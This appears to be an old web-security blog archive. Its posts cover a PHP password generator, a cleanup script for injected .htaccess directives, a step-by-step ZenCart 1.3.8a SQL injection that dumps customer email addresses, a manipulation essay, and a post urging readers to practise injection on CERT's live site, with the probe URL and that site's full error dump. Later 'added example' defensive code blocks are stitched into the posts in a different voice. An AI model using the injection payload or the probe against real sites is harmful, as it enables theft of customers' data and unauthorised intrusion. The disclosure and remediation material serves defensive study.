Web Security

Generate unbreakable passwords from php

Sunday, February 13th, 2011 | Web Security | Comments Off

This is a short post to share my favorite way of generating strong passwords in PHP.

The advantage over other functions you'll find on the internet is that it makes sure every character set is used, and that no character repeats in the final password.

The output of the script is similar to what cPanel generates when creating new accounts or email addresses.

function generatePassword($length = 12) {
    // one pool per character class; every class contributes to the password
    $validchars = array();
    $validchars[] = "0123456789";
    $validchars[] = "abcdfghjkmnpqrstvwxyz";
    $validchars[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZ";
    $validchars[] = "_!@#$%&*()-=+/";

    $password = "";
    $counter  = 0;

    // randomise the order in which the classes are visited
    shuffle($validchars);
    while ($counter < $length) {
        foreach ($validchars as $pool) {
            // stop exactly at $length instead of finishing the round of classes
            if ($counter >= $length) break;
            // every letter is different: strip characters already used from the pool
            $remaining = ($password === "") ? $pool : str_replace(str_split($password), "", $pool);
            if ($remaining === "") {
                throw new RuntimeException("not enough distinct characters for length $length");
            }
            // random_int() is a CSPRNG (PHP 7+); rand() is not suitable for passwords
            $actChar = substr($remaining, random_int(0, strlen($remaining) - 1), 1);
            $password .= $actChar;
            $counter++;
        }
    }
    return $password;
}
 
echo generatePassword();
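As an added example (not the post's code), here is a variant of the same policy that draws with PHP 7's random_int() and shuffles with a CSPRNG-driven Fisher-Yates instead of shuffle(). It keeps the two properties the post wants, every class present and no repeated character, but picks the class of each position at random rather than cycling through the classes in a fixed order, and adds a checker for the policy. The function names and the 16-character length are this example's own; it needs PHP 7.1 or later.

```php
<?php
// Added example, not the post's code. Keeps the post's two guarantees
// (every character class present, no character repeated) but draws with
// random_int(), a CSPRNG, and assigns the class of each position at random
// instead of visiting the classes in a fixed cycle. Requires PHP 7.1+.

function secureShuffle(array $items): array {
    // Fisher-Yates driven by random_int(); PHP's shuffle() is not a CSPRNG.
    for ($i = count($items) - 1; $i > 0; $i--) {
        $j = random_int(0, $i);
        [$items[$i], $items[$j]] = [$items[$j], $items[$i]];
    }
    return $items;
}

function generateSecurePassword(int $length, array $pools): string {
    if ($length < count($pools)) {
        throw new InvalidArgumentException('length must be at least the number of classes');
    }
    // One slot per class guarantees every class appears; the remaining slots
    // are assigned to classes uniformly, then the slot order is shuffled so
    // the class sequence cannot be read off from the position.
    $slots = range(0, count($pools) - 1);
    while (count($slots) < $length) {
        $slots[] = random_int(0, count($pools) - 1);
    }
    $slots = secureShuffle($slots);

    $password = '';
    foreach ($slots as $class) {
        // Drop characters already used so that nothing repeats; fail loudly
        // rather than spin when a class has no unused characters left.
        $remaining = '';
        foreach (str_split($pools[$class]) as $ch) {
            if (strpos($password, $ch) === false) {
                $remaining .= $ch;
            }
        }
        if ($remaining === '') {
            throw new RuntimeException('character class exhausted: shorten the password or enlarge the pool');
        }
        $password .= $remaining[random_int(0, strlen($remaining) - 1)];
    }
    return $password;
}

function meetsPolicy(string $password, array $pools): bool {
    // Every class contributes at least one character ...
    foreach ($pools as $pool) {
        if (strpbrk($password, $pool) === false) {
            return false;
        }
    }
    // ... and no character occurs twice.
    return count(array_unique(str_split($password))) === strlen($password);
}

// Same four classes as the post (its lowercase pool has no e, i, l, o, u).
$pools = [
    '0123456789',
    'abcdfghjkmnpqrstvwxyz',
    'ABCDEFGHIJKLMNOPQRSTUVWXYZ',
    '_!@#$%&*()-=+/',
];
$pw = generateSecurePassword(16, $pools);
echo $pw, PHP_EOL;
var_dump(meetsPolicy($pw, $pools));
```

Both guarantees shrink the set of possible passwords a little compared with drawing every position independently; what matters more for strength is that the source of randomness is unpredictable, which is why rand() and shuffle() are avoided here.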

fix for an iframe injection attack

Tuesday, January 25th, 2011 | Web Security | Comments Off

More and more people, including some of my clients, get attacked by various versions of iframe injections.

One of them involves injecting a PHP file on the host. After that, by various means, code similar to the following is injected into every .htaccess file:

AddType application/x-httpd-php .php .phtml .php3 .php4 .php5 .htm .html
php_value auto_prepend_file /path/xxxx_atacking_file_which_has_php_code

The first line makes Apache hand .htm and .html files to the PHP interpreter as well, and the second prepends the attacker's script to every PHP request, which is how the iframe ends up in every page. To remove that code from each .htaccess file, use the following PHP code:

function r_fix($dir = '.') {
    if ($handle = opendir($dir)) {
        while (false !== ($file = readdir($handle))) {
            if (is_dir("$dir/$file")) {
                // recurse into subdirectories, skipping . and ..
                if ($file != '.' && $file != '..') {
                    r_fix("$dir/$file");
                }
            } elseif ($file == '.htaccess') {
                $path = $dir . '/' . $file;
                $contents = file_get_contents($path);
                // only touch files that reference the injected script
                if (strpos($contents, 'xxxx_atacking_file_which_has_php_code') !== false) {
                    $contents = str_replace('AddType application/x-httpd-php .php .phtml .php3 .php4 .php5 .htm .html', '', $contents);
                    $contents = str_replace('php_value auto_prepend_file /path/xxxx_atacking_file_which_has_php_code', '', $contents);
                    echo $path . " <br>\n"; flush();
                    file_put_contents($path, $contents);
                }
            }
        }
        closedir($handle);
    }
}
 
r_fix();
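An added example, not the post's script: it does the same walk with PHP's RecursiveDirectoryIterator, removes the injected directive lines by pattern rather than by exact string match (so a slightly different AddType list still goes), keeps a copy of each touched file, and defaults to a dry run that only reports what it would change. The marker string is the post's placeholder; the temporary directory and the sample .htaccess are constructed for the run.

```php
<?php
// Added example, not the post's code. Walks a directory tree, finds .htaccess
// files that reference the dropped PHP file, and removes the whole injected
// directive lines instead of relying on an exact string match. The marker
// string and all paths below are placeholders / constructed.

function cleanHtaccess(string $contents, string $marker): array {
    // Remove any auto_prepend_file line pointing at the marker and any AddType
    // line that maps .htm/.html to the PHP handler. Returns the cleaned text
    // and the lines removed, so the caller can log them.
    $removed = [];
    $kept = [];
    foreach (preg_split('/\R/', $contents) as $line) {
        $isPrepend = preg_match('/^\s*php_(?:admin_)?value\s+auto_prepend_file\b/i', $line)
            && strpos($line, $marker) !== false;
        $isAddType = preg_match('/^\s*AddType\s+application\/x-httpd-php\b.*\.html?\b/i', $line);
        if ($isPrepend || $isAddType) {
            $removed[] = $line;
        } else {
            $kept[] = $line;
        }
    }
    return [implode("\n", $kept), $removed];
}

function fixTree(string $root, string $marker, bool $dryRun = true): array {
    // Returns path => removed lines for every .htaccess that was (or would be) changed.
    // Only files that mention the marker are touched, so a site's own
    // AddType line in an uninfected file is left alone.
    $report = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        if ($file->getFilename() !== '.htaccess') {
            continue;
        }
        $path = $file->getPathname();
        $contents = file_get_contents($path);
        if ($contents === false || strpos($contents, $marker) === false) {
            continue;
        }
        [$cleaned, $removed] = cleanHtaccess($contents, $marker);
        if ($removed === []) {
            continue;
        }
        if (!$dryRun) {
            // Keep the infected copy for the incident record, then overwrite.
            copy($path, $path . '.infected-' . date('Ymd-His'));
            file_put_contents($path, $cleaned);
        }
        $report[$path] = $removed;
    }
    return $report;
}

// Constructed sample tree in a temporary directory so the run is offline.
$tmp = sys_get_temp_dir() . '/htaccess-demo-' . getmypid();
mkdir($tmp . '/sub', 0700, true);
file_put_contents($tmp . '/sub/.htaccess',
    "RewriteEngine On\n"
    . "AddType application/x-httpd-php .php .phtml .php3 .php4 .php5 .htm .html\n"
    . "php_value auto_prepend_file /path/xxxx_atacking_file_which_has_php_code\n"
    . "RewriteRule ^old$ /new [R=301,L]\n");

foreach (fixTree($tmp, 'xxxx_atacking_file_which_has_php_code', true) as $path => $lines) {
    echo $path, ":\n";
    foreach ($lines as $l) {
        echo "  - ", $l, "\n";
    }
}

// tidy up the constructed sample
unlink($tmp . '/sub/.htaccess');
rmdir($tmp . '/sub');
rmdir($tmp);
```

Call fixTree() with $dryRun = false to write the files. The script only removes the directives; the prepended PHP file itself, and whatever dropped it, still have to be found and removed, otherwise the .htaccess lines come back.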

Microsoft RDP.

Monday, November 10th, 2008 | Web Security | Comments Off


source: OWASP News

ZenCart 1.3.8a SQL Injection

Friday, November 7th, 2008 | Web Security | Comments Off

Unfortunately, an SQL injection vulnerability was discovered in ZenCart v1.3.8a.

To test it, follow these simple steps:

1. Go to the product listing page by clicking a category.

2. Save the page on your PC, open it in a text editor and modify (assuming there is a product with id 111, or whatever id exists):

<input name="products_id[111]" size="4" type="text" value="0" />
to
<input name="products_id[-1' union select GROUP_CONCAT(customers_email_address), 2 from customers/*] " size="4" type="text" value="0" />

3. Submit the form by adding at least one product to the cart from the modified input box.

The result is that a comma-separated list of all customer email addresses is shown.

To protect against this attack, apply the following security patch:

http://www.zen-cart.com/forum/showthread.php?p=604473
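The injection works because the array keys of products_id[] reach the SQL query as they arrive. As an added example (not ZenCart's code), the following shows the server-side check that closes this class of hole: accept only integer keys, and hand them to the database as bound parameters so they never become part of the SQL text. The function and table names are illustrative and the request data is constructed.

```php
<?php
// Added example, not ZenCart's code. The keys of $_POST['products_id'] are
// attacker-controlled strings; keep a key only if it is a plain positive
// decimal integer, and query with placeholders. Names are illustrative.

function validProductIds(array $postedQuantities): array {
    $ids = [];
    foreach ($postedQuantities as $key => $qty) {
        // PHP turns '111' into an int key; normalise back to a string to test it
        $key = (string) $key;
        if (!ctype_digit($key) || $key === '0' || strlen($key) > 10) {
            continue; // drops anything that is not a bare integer
        }
        $ids[] = (int) $key;
    }
    return $ids;
}

function productsInStockSql(array $ids): array {
    // Build a parameterised IN (...) list; the ids travel as bound values.
    if ($ids === []) {
        return ['', []];
    }
    $placeholders = implode(',', array_fill(0, count($ids), '?'));
    $sql = "SELECT products_id, products_quantity FROM products WHERE products_id IN ($placeholders)";
    return [$sql, $ids];
}

// Constructed request data: one honest key, one hostile key, one junk key.
$posted = [
    '111' => '1',
    "-1' union select GROUP_CONCAT(customers_email_address), 2 from customers/*" => '1',
    'abc' => '3',
];
$ids = validProductIds($posted);
[$sql, $params] = productsInStockSql($ids);
echo $sql, PHP_EOL;
print_r($params);

// With PDO the bound values are sent separately from the query text:
// $stmt = $pdo->prepare($sql); $stmt->execute($params);
```

Only the honest key survives validation; the hostile and junk keys are dropped before any SQL is built, and even a valid id is passed as a parameter rather than interpolated.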


Covert Manipulation.

Friday, October 31st, 2008 | Web Security | Comments Off

I've been interested in communication for a long time, and I am especially interested in the use of language for persuasion. Once you know how powerful words really are, you'll start using them with care. The conscious mind behaves in patterns, and those patterns can be broken. It's also possible to embed hidden commands inside language in order to trigger a response from someone. In fact, you can break someone's thought pattern and replace it with yours. This can be easily proven. You read the words I typed here; they entered your mind in both a conscious and an unconscious way. I transferred my thoughts into your thoughts; unconsciously I might have given you new instructions to change your feelings or ideas about something in a covert way. You are probably aware of this already, because certain words make you feel different than other words. Hacking the mind through covert manipulation is easier than you might have thought. Ask yourself: what impression did I give just now? What did I change that you weren't aware of before reading this text? Which thoughts are yours and which were mine? And how will they affect the rest of your day?

source: OWASP News

Oscommerce Sql Injection

Sunday, October 26th, 2008 | Web Security | 1 Comment

WARNING: Do not use any kind of information found here to harm websites, business, people lives etc…
The unauthorized usage of the aforementioned methods could lead to legal prosecution and severe penalties.

Ever wanted to check how an SQL injection might work with an osCommerce store?


Secure Coding And Cocktail Parties.

Saturday, October 25th, 2008 | Web Security | Comments Off

I am going to be very clear about this today. In the past I posted vulnerabilities in many websites, including websites from companies who say they secure web applications, or store web application vulnerabilities, and even those who give out certifications like (ISC)2, and I left out those who talk about application security while using insecure software packages to speak about it, because yeah, it's not their fault, is it? What does that say about them? Well, for starters it's the same thing as having a police officer committing a crime. It's about time for some introspective analysis for each and everyone in the web application security field before this stuff gets further out of control. No wonder no one takes web application security and its experts seriously; look at the mess around you and your application security vendor who fails to secure himself. So when I see the secure coding group from CERT talk about secure coding standards[1] I get really disappointed when they are vulnerable themselves. It's not like we are dealing with a space mission to Mars for example, it's just web application security for fuck sake! Something that can be explained to any 5th grader on four sheets of paper.

Judge for yourself; it's always useful to gain some extra SQL practice in real life:

https://www.securecoding.cert.org/confluence/dosearchsite.action?queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername=

A system error has occurred - our apologies!

Please ask your Confluence administrator to create a support issue on Atlassian's support system at http://support.atlassian.com with the following information:

 1. a description of your problem and what you were doing at the time it occurred
 2. a copy of the error and system information found below
 3. a copy of the application logs (if possible).

Your Confluence administrator can use the support request form to create a support ticket which will include this information.

We will respond as promptly as possible.
Thank you!

Return to site homepage
Cause

java.lang.IllegalArgumentException: Invalid search query found in specified search. at com.atlassian.confluence.search.v2.lucene.LuceneSearchManager.search(LuceneSearchManager.java:74)

caused by: java.lang.IllegalArgumentException: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at com.atlassian.confluence.search.v2.lucene.mapper.TextFieldQueryMapper.convertToLuceneQuery(TextFieldQueryMapper.java:46)

caused by: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at org.apache.lucene.queryParser.QueryParser.parse(QueryParser.java:153)
Stack Trace:

java.lang.IllegalArgumentException: Invalid search query found in specified search. at com.atlassian.confluence.search.v2.lucene.LuceneSearchManager.search(LuceneSearchManager.java:74) at com.atlassian.confluence.search.actions.SearchSiteAction.exactUsernameSearch(SearchSiteAction.java:286) at com.atlassian.confluence.search.actions.SearchSiteAction.getContributors(SearchSiteAction.java:237) at com.atlassian.confluence.search.actions.SearchSiteAction.validate(SearchSiteAction.java:158) at com.opensymphony.xwork.interceptor.DefaultWorkflowInterceptor.intercept(DefaultWorkflowInterceptor.java:44) at com.atlassian.confluence.core.ConfluenceWorkflowInterceptor.intercept(ConfluenceWorkflowInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.interceptors.CaptchaInterceptor.intercept(CaptchaInterceptor.java:46) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.util.LoggingContextInterceptor.intercept(LoggingContextInterceptor.java:48) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.CancellingInterceptor.intercept(CancellingInterceptor.java:23) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.actions.PermissionCheckInterceptor.intercept(PermissionCheckInterceptor.java:54) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at 
com.atlassian.confluence.pages.actions.CommentAwareInterceptor.intercept(CommentAwareInterceptor.java:43) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.pages.actions.PageAwareInterceptor.intercept(PageAwareInterceptor.java:120) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.spaces.actions.SpaceAwareInterceptor.intercept(SpaceAwareInterceptor.java:67) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:39) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:25) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:97) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at 
com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115) at com.opensymphony.webwork.dispatcher.ServletDispatcher.serviceAction(ServletDispatcher.java:229) at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199) at javax.servlet.http.HttpServlet.service(HttpServlet.java:803) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.opensymphony.module.sitemesh.filter.PageFilter.parsePage(PageFilter.java:118) at com.atlassian.confluence.util.profiling.ProfilingPageFilter.parsePage(ProfilingPageFilter.java:153) at com.opensymphony.module.sitemesh.filter.PageFilter.doFilter(PageFilter.java:54) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.jmx.JmxFilter.doFilter(JmxFilter.java:109) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.core.filters.ServletContextThreadLocalFilter.doFilter(ServletContextThreadLocalFilter.java:21) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.util.LoggingContextFilter.doFilter(LoggingContextFilter.java:49) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.util.UserThreadLocalFilter.doFilter(UserThreadLocalFilter.java:44) at 
org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.seraph.filter.SecurityFilter.doFilter(SecurityFilter.java:192) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.seraph.filter.TrustedApplicationsFilter.doFilter(TrustedApplicationsFilter.java:120) at com.atlassian.confluence.util.AbstractBootstrapHotSwappingFilter.doFilter(AbstractBootstrapHotSwappingFilter.java:28) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.seraph.filter.BaseLoginFilter.doFilter(BaseLoginFilter.java:125) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.util.ClusterHeaderFilter.doFilter(ClusterHeaderFilter.java:35) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.johnson.filters.AbstractJohnsonFilter.doFilter(AbstractJohnsonFilter.java:72) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.springframework.orm.hibernate.support.OpenSessionInViewFilter.doFilterInternal(OpenSessionInViewFilter.java:170) at com.atlassian.spring.filter.FlushingSpringSessionInViewFilter.doFilterInternal(FlushingSpringSessionInViewFilter.java:29) at 
org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:75) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.util.profiling.filters.ProfilingFilter.doFilter(ProfilingFilter.java:142) at com.atlassian.core.filters.ProfilingAndErrorFilter.doFilter(ProfilingAndErrorFilter.java:27) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.core.datetime.RequestTimeThreadLocalFilter.doFilter(RequestTimeThreadLocalFilter.java:34) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.confluence.util.RequestCacheThreadLocalFilter.doFilter(RequestCacheThreadLocalFilter.java:25) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.gzipfilter.GzipFilter.doFilterInternal(GzipFilter.java:94) at com.atlassian.gzipfilter.GzipFilter.doFilter(GzipFilter.java:64) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at com.atlassian.core.filters.AbstractEncodingFilter.doFilter(AbstractEncodingFilter.java:33) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:215) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at 
org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.valves.FastCommonAccessLogValve.invoke(FastCommonAccessLogValve.java:482) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:174) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:595)
Caused by: java.lang.IllegalArgumentException: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at com.atlassian.confluence.search.v2.lucene.mapper.TextFieldQueryMapper.convertToLuceneQuery(TextFieldQueryMapper.java:46) at com.atlassian.confluence.search.v2.lucene.mapper.TextFieldQueryMapper.convertToLuceneQuery(TextFieldQueryMapper.java:15) at com.atlassian.confluence.search.v2.lucene.DelegatingLuceneSearchMapper.convertToLuceneQuery(DelegatingLuceneSearchMapper.java:30) at com.atlassian.confluence.search.v2.lucene.mapper.BooleanQueryMapper.addSubQueries(BooleanQueryMapper.java:43) at com.atlassian.confluence.search.v2.lucene.mapper.BooleanQueryMapper.convertToLuceneQuery(BooleanQueryMapper.java:29) at com.atlassian.confluence.search.v2.lucene.DelegatingLuceneSearchMapper.convertToLuceneQuery(DelegatingLuceneSearchMapper.java:30) at com.atlassian.confluence.search.v2.lucene.LuceneSearchManager.search(LuceneSearchManager.java:52) ... 113 more
Caused by: org.apache.lucene.queryParser.ParseException: Cannot parse '">': Lexical error at line 1, column 3. Encountered: <EOF> after : "\">" at org.apache.lucene.queryParser.QueryParser.parse(QueryParser.java:153) at com.atlassian.confluence.search.v2.lucene.mapper.TextFieldQueryMapper.convertToLuceneQuery(TextFieldQueryMapper.java:42) ... 119 more

Referer URL

Unknown
Confluence Application Information
Build Information

buildNumber: 1418
upTime: 2 days, 2 hours, 12 minutes, 11 seconds
devMode: false
version: 2.9.1
home: /var/lib/confluence
Unique ID: 0x0000011D5EDA2F53458D112A3234C9F2472F5C45C3AF54AE9C867DF600E1355
Server information

Application Server: Apache Tomcat/5.5.26
Servlet Version: 2.4
Database Dialect: com.atlassian.hibernate.dialect.MySQLDialect
Database Driver Name: com.mysql.jdbc.Driver
Database Driver Version: 5.0
Database Name: MySQL
Database Version: 4.1.22
Database Transaction Isolation: Repeatable read
Database Latency: 0
Memory Information

Total Memory: 1016 MB
Used Memory: 913 MB
Free Memory: 103 MB
System Information

userName: tomcat
favouriteColour: Sangria
time: 08:05:12
javaVm: Java HotSpot(TM) Client VM
operatingSystemArchitecture: i386
date: Friday, 24 Oct 2008
operatingSystem: Linux 2.6.9-78.0.1.ELsmp
jvmVersion: 1.0
userTimezone: US/Eastern
fileSystemEncoding: UTF-8
jvmImplementationVersion: 1.5.0_16-b02
appServer: Apache Tomcat
javaVendor: Sun Microsystems Inc.
javaVersion: 1.5.0_16
javaRuntime: Java(TM) 2 Runtime Environment, Standard Edition
jvmVendor: Sun Microsystems Inc.
Cluster Information

Not clustered.
Plugins

 * Add Content Menu Sections (confluence.menu.add, Version: 1.0) * Admin Sections (confluence.sections.admin, Version: 1.0) * Advanced Macros (confluence.macros.advanced, Version: 1.4.2) * Attachment Actions (confluence.sections.attachments, Version: 1.0) * Attachment Extractors (com.atlassian.confluence.plugins.attachmentExtractors, Version: 1.0-SNAPSHOT) * Basic Macros (confluence.macros.basic, Version: 1.4) * Browse Menu Items (confluence.sections.browse, Version: 1.0) * Chart Plugin (confluence.extra.chart, Version: 1.11) * Clickr Theme (com.atlassian.confluence.themes.clickr, Version: 2.2) * Code Macro (confluence.macros.code, Version: 1.5) * Comment Action Sections (confluence.comment.action, Version: 1.0) * Confluence Atlassian Plugin Repository (confluence.repository.client, Version: 2.0.15) * Confluence Attachments Plugin (confluence.extra.attachments, Version: 2.10) * Confluence Classic Theme (com.atlassian.confluence.themes.classic, Version: 2.0) * Confluence Contributors Plugin (com.atlassian.confluence.contributors, Version: 1.2) * Confluence Usage Stats (com.atlassian.confluence.ext.usage, Version: 0.8) * Content Action Menu Sections (confluence.content.action.menu, Version: 1.0) * Content Buttons (confluence.sections.page.temp, Version: 1.0) * Core Extractors (confluence.extractors.core, Version: 1.4) * Core Listeners (confluence.listeners.core, Version: 1.3) * Core Path Converters (confluence.converters.core, Version: 1.0) * Core Startup and Shutdown (confluence.lifecycle.core, Version: 1) * Dashboard Macros (confluence.macros.dashboard, Version: 1.4.2) * Default Theme (com.atlassian.confluence.themes.default, Version: 1.0) * Dynamic Task List 2 Plugin (confluence.extra.dynamictasklist2, Version: 3.0.6) * Edit Profile Sections (confluence.sections.profile.edit, Version: 1.0) * French language pack (confluence.languages.fr_FR, Version: 1.8) * German language pack (confluence.languages.de_DE, Version: 1.3) * Global Labels Sections 
(confluence.sections.labels, Version: 1.0) * Information Macros (confluence.extra.information, Version: 1.0) * Layout Macros (confluence.extra.layout, Version: 1.1) * Left Navigation Theme (com.atlassian.confluence.themes.leftnavigation, Version: 2.0) * Live Search Macros (confluence.extra.livesearch, Version: 2.8) * News Tabs (confluence.sections.news, Version: 1.0) * Page Operations (confluence.sections.page.operations, Version: 1.0) * Page Tabs (confluence.sections.page, Version: 1.0) * Page Tabs (confluence.search.mappers.lucene, Version: 1.0) * Page Tree (com.atlassian.confluence.plugins.pagetree, Version: 1.10) * Page View Links (confluence.sections.page.actions, Version: 1.0) * Profile Tabs (confluence.sections.profile, Version: 1.0) * Search Web Interface (confluence.sections.search.view, Version: 1.0) * Space Actions Sections (confluence.sections.space.actions, Version: 1.0) * Space Admin Sections (confluence.sections.space.admin, Version: 1.0) * Space Advanced Sections (confluence.sections.space.advanced, Version: 1.0) * Space Browse Sections (confluence.sections.space.browse, Version: 1.0) * Space Item Tabs (confluence.sections.space, Version: 1.0) * Space Labels Sections (confluence.sections.space.labels, Version: 1.0) * Space Pages Sections (confluence.sections.space.pages, Version: 1.0) * System Web Resources (confluence.web.resources, Version: 1.0) * Table of Contents Plugin (org.randombits.confluence.toc, Version: 2.4.8)

 * Tabular Metadata (confluence.extra.masterdetail, Version: 2.7) * TinyMCE Editor Plugin (com.atlassian.confluence.extra.tinymceplugin, Version: 3.0-rc2) * User Lister (confluence.extra.userlister, Version: 2.4) * User Menu Sections (confluence.user.menu, Version: 1.0) * View Profile Web Interface (confluence.sections.profile.view, Version: 1.0) * Wiki Renderer Components (confluence.renderer.components, Version: 1.0)

Request
Information

URL https://www.securecoding.cert.org/confluence/500page.jsp 
URI /confluence/500page.jsp 
Context Path /confluence
Servlet Path /500page.jsp
Query String queryString=%22%3E&queryString=%22%3E&where=conf_all&type=&lastModified=&contributor=%22%3E&contributorUsername=

Headers (Limited subset)

host www.securecoding.cert.org
user-agent Mozilla/1.0 (Windows; U; Windows NT 1.1; en-US; rv:2.9.0.3) Gecko/2002016217
keep-alive 300
connection keep-alive

Attributes

javax.servlet.forward.request_uri /confluence/dosearchsite.action
javax.servlet.forward.context_path /confluence
javax.servlet.forward.servlet_path /dosearchsite.action
javax.servlet.forward.path_info /500page.jsp
